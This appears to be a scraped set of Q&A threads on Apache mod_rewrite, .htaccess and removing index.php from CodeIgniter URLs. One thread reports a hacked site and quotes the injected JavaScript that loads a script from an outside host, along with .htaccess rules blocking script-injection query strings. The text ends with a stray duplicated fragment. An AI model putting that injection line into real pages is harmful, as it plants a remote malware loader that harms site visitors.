mod_rewrite in Users/<username>/Sites directory on OSX - apache

There may be a fairly simple solution to this, but I've been searching for a couple of days and can't find one, soooo...
I'm developing a website on an OS X box (Lion). The working site is hosted at /Users/username/Sites and I've added that directory to /etc/apache2/users/username.conf. I can view the pages with no problems.
BUT... I'm using CodeIgniter and I want to remove the index.php from the URL. This should be a fairly simple job for mod_rewrite. I've added an .htaccess file to the directory (and set AllowOverride All in my conf file above). After googling around I discovered that I need Options +FollowSymLinks set (I did in the .htaccess file).
The problem with this is that it appears to rewrite the URL from localhost/~username/ to /Users/username/Sites. Problem with this is that, in that form, the browser simply attempts to DOWNLOAD the index.php file, rather than executing it. This gets worse when the links are /Users//Sites/index.php/controller/function because those files don't exist... CodeIgniter is meant to take over in the index.php, but only if it is executed.
So I can't remove the Options +FollowSymLinks because that generates Access Forbidden errors, and I can't leave it in for the reasons above.
Interestingly, putting exactly the same website to the /Library/WebServer/Documents directory works fine. OS X doesn't appear to mind FollowSymLinks to that directory, probably because it is set as the DocumentRoot in httpd.conf
My httpd.conf is stock Lion, except for AllowOverride All on /Library/Webserver/Documents. mod_rewrite is enabled.
My username.conf is
<Directory "/Users/username/Sites/">
Options Indexes MultiViews FollowSymLinks
AllowOverride All
Order allow,deny
Allow from all
</Directory>
My .htaccess file in the site's directory is
Options +FollowSymLinks
RewriteEngine on
RewriteCond $1 !^(index\.php|static|robots\.txt)
RewriteRule ^(.*)$ index.php/$1 [L]
Clearly, I can develop on /Library/WebServer/Documents, but would prefer to do it in my local files.

There is an excellent wiki page on the CodeIgniter website about mod rewrite, it covers all of the changes you need to make to your .htaccess file and the CodeIgniter files itself.
It is easy to forget changing values in your config file like the index_page from:
$config['index_page'] = "index.php";
to
$config['index_page'] = "";
The example .htaccess file shown on that wiki page is (I have removed the comments):
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_URI} ^system.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
RewriteCond %{REQUEST_URI} ^application.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?/$1 [L]
And if you find that you need to, just add the AddType and Options properties to it.

Here some of tricks may usefull
AddType application/x-httpd-php .php
Options +FollowSymLinks
RewriteEngine on
RewriteBase /Users/username/Sites/
RewriteEngine on
RewriteCond $1 !^(index\.php|static|robots\.txt)
RewriteRule ^(.*)$ index.php/$1 [L]
Also you can log rewriting log. But suggest you to remove these lines , after you fix everything
RewriteLog "/var/log/httpd/rewrite_log"
RewriteLogLevel 9

Related

How to use rewrite rules using .htaccess in an aliased directory outside document root

I am trying to use .htaccess to rewrite requests for PHP files that don't explicitly include the .php file extension (e.g. example.com/foo should rewrite to example.com/foo.php), but without applying that rule to any folders (or subfolders) of the document root.
My http.conf file contains following:
DocumentRoot "/webfiles"
<Directory "/webfiles">
Options Indexes FollowSymLinks Includes ExecCGI
AllowOverride All
Require all granted
</Directory>
Alias "/exams" "/training/exams"
<Directory "/training/exams">
Options Indexes FollowSymLinks Includes ExecCGI
AllowOverride All
Require all granted
</Directory>
DirectoryIndex index.php
There is a .htaccess file in the /training/exams folder containing following:
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME}.php -f
RewriteRule ^([^\.]+)$ $1.php [NC,L]
The goal is to:
serve requests like example.com/exams with /training/exams/index.php file,
serve requests like example.com/exams/first with /training/exams/first.php file,
while still having requests like example.com/myhome.html served with /webfiles/myhome.html.
Examples 1. and 3. work fine, but for 2. I get a 404 error.
Interesting question.
RewriteRule ^([^\.]+)$ $1.php [NC,L]
This ultimately ends up trying to rewrite the URL to /training/exams/first.php (after the directory-prefix is added back). I think that mod_rewrite (in a directory context) is seeing this as a URL-path and example.com/training/exams/first.php doesn't exist, hence the 404.
You can either use the RewriteBase directive to override the directory-prefix with the correct root-relative URL-path instead. For example:
RewriteBase /exams
Or, hardcode the URL-path in the RewriteRule substitution. For example:
RewriteRule ^([^.]+)$ /exams/$1.php [L]
(No need for the NC flag or to escape the literal dot when used in a character class.)
Or, use the REQUEST_URI server variable to construct a root-relative URL-path:
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME}.php -f
RewriteRule ^ %{REQUEST_URI}.php [L]

AllowOverride and RewriteCond/RewriteRule interactions

I'm trying to set up a site running on Apache 2.4.16 to redirect all www URLs to non-www URLs. I'm using HTML5 Boilerplate's Apache configs to do this (as well as everything else they provide).
https://github.com/h5bp/server-configs-apache/blob/master/dist/.htaccess
This happens on line 380, seen below:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC]
RewriteRule ^ %{ENV:PROTO}://%1%{REQUEST_URI} [R=301,L]
</IfModule>
I'm using Include to add the whole file to my vhost config for the site, as well as an AllowOverride All for another .htaccess file at my doc root (same one that comes with Laravel 5):
production.vhost.conf (relevant part)
<Directory /var/www/hostname/production>
AllowOverride All
# Include H5BP server configs
Include server-configs-apache/dist/.htaccess
</Directory>
.htaccess (at doc root)
<IfModule mod_rewrite.c>
<IfModule mod_negotiation.c>
Options -MultiViews
</IfModule>
RewriteEngine On
# Redirect Trailing Slashes If Not A Folder...
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)/$ /$1 [L,R=301]
# Handle Front Controller...
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^ index.php [L]
</IfModule>
Now, almost everything from H5BP's .htaccess was working, except for the redirect from www to non-www. After poking around I noticed that the redirect was only working when I'd remove AllowOverride All from the <Directory> block in the vhost. So the doc root .htaccess was somehow overriding the rewrite conditions.
I've actually already fixed my initial issue by moving the doc root .htaccess contents into the vhost file and removing the AllowOverride, but I'm more curious as to why this was happening; more specifically how AllowOverride interacts with RewriteCond and RewriteRule.
My hunch is that the .htaccess in my doc root was overriding the www to non-www redirect, but I'm not sure why that one specifically. For example, the http -> https redirect worked without issue (line 352 of H5BP, uncommented out in mine), it seemed to be just that one redirect. I didnt even think that those rules could be overridden since RewriteCond/RewriteRules feel unique to me.
If there are any, what are the rules that determine how an .htaccess can override a rewrite rule?
If there are any, what are the rules that determine how an .htaccess
can override a rewrite rule?
Conditions and rules don't dictate how .htaccess works. AllowOverride is what allows .htaccess usage. If you have AllowOverride All then .htaccess is allowed, if you have AllowOverride None, then it's not and it will be ignored. In 2.4 None is the default.
.htaccess is per directory so it will take precedence if it's located in a directory that has rules applied as long as .htaccess file usage is allowed there. Which is confgiured in the server config in VirtualHost or Directory directives.
Also using an include for .htaccess in a vhost is a very bad configuration. If you have access to the vhost file or the config, you should create another config and include it with the .htaccess contents.
You should not be using .htaccess files at all actually with access to the server config. See this apache recommendation on not using .htaccess.
https://httpd.apache.org/docs/2.4/howto/htaccess.html#when

I can't get rid of index.php in my urls on Codeigniter with XAMPP/Apache 2.4.9/PHP 5.5.11, and I've tried 4 solutions

Mod_Rewrite is on. I've created an .htaccess file inside the htdocs/ci_intro folder that contains: application, system, and index.php files
My .htaccess file content:
Options FollowSymLinks
Options +Indexes
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond $1 !^(index.php)
RewriteRule ^(.*)$ /index.php/$1 [L]
I've changed the application/config/config.php to:
$config['base_url'] = '';
and
$config['index_page'] = '';
I also changed httpd.conf:
<Directory />
AllowOverride All
# Require all denied
</Directory>
this URL works
http://localhost/ci_intro/index.php/site/about
this URL brings "Object Not Found" 404
http://localhost/ci_intro/site/about
I've tried 4 different .htaccess file versions, from different blog answers.
I'm on Windows 8.1 OS. I'm new, done some javascript.

Attack site via .htaccess

Yesterday someone attacked my sites.
I use my own CMS and I doubt that they have access to .Htaccess
I would like to know if my .Htaccess is protected.
Actually my js files was affected by this code:
/*df1e0b*/
/**/
document.write("<script type='text/javascript' src='http://audiorealestudio.com /fotosdiegoalejandro/VfTzdPj4.php'></"+ "script>");
/*/df1e0b*/
Also i find one php file on root rbKcy8Vj.php
This is my htaccess
# protect .htaccess
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
# directory browsing
Options All -Indexes
<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<Files ~ ".(xml|css|jpe?g|png|gif|js)$">
Allow from all
</Files>
<Files config.php>
Order deny,allow
Deny from all
</Files>
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{REQUEST_URI} ^(.*)_vti(.*)$ [OR]
RewriteRule ^(.*)$ index.php [F,L]
RewriteRule ^contact/?$ contact.php [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^test/([0-9a-zA-Z-_]+)/?$ test.php?cat=$1 [QSA,L]
No actually your .htaccess doesnt seem to be protected. I have gone through almost the same earlier, and my .htaccess was compromised multiple times during that attack even if i set its permissions to 444.
Bonus: How to resolve this issues?
Alright I have faced this issue earlier with Joomla CMS, this usually happens when you don't update and 0-day exploits turn up or due to bad plugins. Based on your javascript code above it looks like a XSS exploit.
Now what has happened is that a PHP shell has been uploaded to your server via the script code executed, you need to first update your cms so that this exploit does not occur again. Clean all the files affected (remove weird code you end up seeing) there might be multiple files best way is to see the date modified. Also look through your folders for suspicious files, you can find them using date modified/created and the dates might be weird like in my case it was set was 1970 so I couldn't find it easily.
After you have removed the suspicious js code, weird php scripts and updated your cms then make sure your .htaccess is clean and its permissions are set as 444. Thats it, the attack wont happen again (unless you didnt update your cms)

CodeIgniter remove index.php apache mod_rewrite

I'm using CodeIgniter on a Windows machine using the Zend Comunity Server with apache. My apache is properly configured to handle .htaccess directives and mod_rewrite is enabled (httpd.conf):
<Directory />
Options FollowSymLinks
AllowOverride FileInfo
Order deny,allow
Deny from all
</Directory>
My root is C:\www\ and my site is located in C:\www\david\ and when I type http://localhost/david/, the index.php is loaded along with the correct controller. I want to access my things directly through http://localhost/david/Articles/ instead of http://localhost/david/index.php/Articles/. To do this I have to use apache rewrite module.
To do so, I've placed a .htaccessfile in the C:\www\david\ folder. This file contains code I found on here :
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /david/
#Removes access to the system folder by users.
#Additionally this will allow you to create a System.php controller,
#previously this would not have been possible.
#'system' can be replaced if you have renamed your system folder.
RewriteCond %{REQUEST_URI} ^core.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
#When your application folder isn't in the system folder
#This snippet prevents user access to the application folder
#Submitted by: Fabdrol
#Rename 'application' to your applications folder name.
RewriteCond %{REQUEST_URI} ^application.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
#Checks to see if the user is attempting to access a valid file,
#such as an image or css document, if this isn't true it sends the
#request to index.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?/$1 [L]
</IfModule>
<IfModule !mod_rewrite.c>
# If we don't have mod_rewrite installed, all 404's
# can be sent to index.php, and everything works as normal.
# Submitted by: ElliotHaughin
ErrorDocument 404 /index.php
</IfModule>
I made a couple of changes to the code since my configuration is a bit different from the default. I'm not on the root so : 'RewriteBase /davidfrancoeur.com/' and I've renamed the CodeIgniter system folder for additional security so :
RewriteCond %{REQUEST_URI} ^core.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
With this done, anything should work properly, I should be able to access http://localhost/david/Articles/ without a problem and I think I shouldn't be able to reach http://localhost/david/core/config/config.php directly.
Unfortunately, it doesn't work, it doesn't even look like any rewriting is done. Do you see if I'm doing something wrong here? Is there a way to know if apache actually rewrite anything?
Thanks a lot. And yes I looked at the millions of article I could found about this... :(
EDIT
CI 2.0.2, PHP 5.3, Apache 2.2
It will work.....actually your first two rewrite conditions and rules are working but in third rewrite condition you are allowing user to access request file ,even if it is core or system file.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !^core.*
RewriteCond %{REQUEST_FILENAME} !^system.*
RewriteRule ^(.*)$ index.php?/$1 [L]
Edit: Fixed 'rewrite' typo
After looking carefully into the httpd.conf of my Zend Community Server, I realized that there was two <Directory />instruction. The first one was empty as shown in the question and the second one looked like that :
<Directory "C:\Dropbox\www">
#
# Possible values for the Options directive are "None", "All",
# or any combination of:
# Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
#
# Note that "MultiViews" must be named *explicitly* --- "Options All"
# doesn't give it to you.
#
# The Options directive is both complicated and important. Please see
# http://httpd.apache.org/docs/2.2/mod/core.html#options
# for more information.
#
Options Indexes FollowSymLinks
#
# AllowOverride controls what directives may be placed in .htaccess files.
# It can be "All", "None", or any combination of the keywords:
# Options FileInfo AuthConfig Limit
#
AllowOverride None
#
# Controls who can get stuff from this server.
#
Order allow,deny
Allow from all
</Directory>
I changed the following line AllowOverride None to AllowOverride All` and it worked. For those who would like to know more about URL rewrite with CodeIgniter look there : http://codeigniter.com/wiki/mod_rewrite/
And to understand properly what AllowOverridedoes read : http://httpd.apache.org/docs/2.0/mod/core.html#allowoverride
Thanks again to ever helped!
ppet prevents user access to the application folder
#Submitted by: Fabdrol
#Rename 'application' to your applications folder name.
RewriteCond %{REQUEST_URI} ^application.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
#Checks to see if the user is attempting to access a valid file,
#such as an image or css document, if this isn't true it sends the
#request to index.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?/$1 [L]